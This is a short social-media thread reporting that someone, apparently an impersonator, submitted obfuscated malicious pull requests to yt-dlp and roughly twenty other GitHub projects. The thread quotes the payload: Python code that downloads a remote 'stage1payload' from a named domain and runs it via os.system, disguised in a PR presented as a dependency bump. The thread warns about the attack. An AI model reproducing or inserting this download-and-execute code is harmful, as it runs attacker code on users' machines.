Public
- Public
- Network
- Groups
- Popular
- People

Conversation

Notices

DarkMahesvara (darkmahesvara@varishangout.net)'s status on Thursday, 14-Nov-2024 08:11:53 JST DarkMahesvara

someone tried to commit obviously obfuscated malicious code to yt-dlp, stable diffusion, streamlink, qutebrowser, ungoogle chromium and about 20 other github projects. apparently mostly a impersonation attack used to smear.

code:
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www(.)evildojo.com/stage1payload")\ny = x.read()\nz = y\x04\x06decode("utf8")\nx.close()\nos.system(z)\n'

https://web.archive.org/web/20241112105911/https://github.com/yt-dlp/yt-dlp/pull/11520

https://xcancel.com/vxunderground/status/1856450468945506615

https://xcancel.com/evildojo666/status/1856413636748562827
In conversation about 10 days ago from varishangout.net permalink
Attachments
1. Untitled attachment
2. Untitled attachment
  https://varishangout.net/media/740bf503-f446-4476-a780-384ac8a72f53/53253523.jpg
3. [build] Bump websockets, curl-cffi deps by evildojo666 · Pull Request #11520 · yt-dlp/yt-dlp
  
  IMPORTANT: PRs without the template will be CLOSED Description of your pull request and other information Bumps websockets, curl-cffi dependencies to new versions Template Before submitting a pu...
4. Untitled attachment
5. Untitled attachment
- :awoo_tired: shotgun snuggler :clownpiece_smug: and pilinsin like this.
- ジエントＰ (freevocaloidclickrighthere@social.076.moe)'s status on Thursday, 14-Nov-2024 08:24:05 JST ジエントＰ
  in reply to
  
  Hijacked account or assumed somone elses name who's otherwise trusted?
  
  In conversation about 10 days ago permalink
- DarkMahesvara (darkmahesvara@varishangout.net)'s status on Friday, 15-Nov-2024 01:18:23 JST DarkMahesvara
  in reply to
  - ジエントＰ
  @freevocaloidclickrighthere impersonator
  
  In conversation about 9 days ago permalink
  
  ジエントＰ likes this.

Public

Conversation

Notices

Feeds